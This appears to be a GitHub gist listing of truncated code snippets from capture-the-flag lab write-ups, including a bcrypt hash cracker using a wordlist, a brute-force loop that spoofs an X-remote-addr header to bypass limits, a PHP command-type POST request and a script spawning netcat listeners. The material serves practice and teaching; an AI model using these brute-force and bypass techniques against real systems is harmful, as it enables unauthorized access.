This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# -*- coding: utf-8 -*- | |
# Author: 0xsanz | |
import re | |
import sys | |
import time | |
import requests | |
import datetime | |
import argparse |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#https://github.com/eclipse/paho.mqtt.python#getting-started | |
#https://0xsanz.medium.com/broker-tryhackme-2a80dabaea56 | |
import paho.mqtt.client as mqtt | |
# The callback for when the client receives a CONNACK response from the server. | |
def on_connect(client, userdata, flags, rc): | |
print("Connected with result code "+str(rc)) | |
# Subscribing in on_connect() means that if we lose the connection and | |
# reconnect then subscriptions will be renewed. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import bcrypt | |
import base64 | |
salt = b'$2b$12$SVInH5XmuS3C7eQkmqa6UO' | |
mypass = b'$2b$12$SVInH5XmuS3C7eQkmqa6UOM6sDIuumJPrvuiTr.Lbz3GCcUqdf.z6' | |
with open('/usr/share/wordlists/rockyou.txt') as fp: | |
line = fp.readline() | |
while line: | |
#bpass = line.strip().encode('ascii') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
//https://stackoverflow.com/questions/5647461/how-do-i-send-a-post-request-with-php | |
$url = 'http://10.8.98.192:8080/'; | |
$data = array('password' => '[REDACTED]', 'cmdtype' => 'lsla'); | |
// use key 'http' even if you send the request to https://... | |
$options = array( | |
'http' => array( | |
'header' => "Content-type: application/x-www-form-urlencoded\r\n", | |
'method' => 'POST', |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
root@Inferno:/tmp# cat /var/www/html/machine_services1320.sh | |
pkill bash & | |
nc -nvlp 21 & | |
nc -nvlp 23 & | |
nc -nvlp 25 & | |
nc -nvlp 110 & | |
nc -nvlp 88 & | |
nc -nvlp 53 & | |
nc -nvlp 194 & | |
nc -nvlp 389 & |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
/*https://0xsanz.medium.com/en-pass-tryhackme-4b319526b634*/ | |
if($_SERVER["REQUEST_METHOD"] == "POST") | |
{ | |
$title = $_POST["title"]; | |
if (!preg_match('/[a-zA-Z0-9]/i' , $title )) | |
{ | |
$val = explode(",",$title); | |
$sum = 0; | |
for($i = 0 ; $i < 9; $i++) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// https://0xsanz.medium.com/classic-passwd-tryhackme-60b2ad5c5008 | |
undefined8 main(void) | |
{ | |
vuln(); | |
gfl(); | |
return 0; | |
} | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# https://0xsanz.medium.com/sustah-tryhackme-45550a6fe7e3 | |
import requests | |
for x in range(10000, 25000): | |
r = requests.post('http://10.10.91.116:8085', data = {'number':x},headers = {'X-remote-addr': '127.0.0.1'}) | |
reply = r.text | |
if "Oh no! How unlucky. Spin the wheel and try again" in r.text: | |
print("No Dice :( for Number " + str(x)) | |
else: |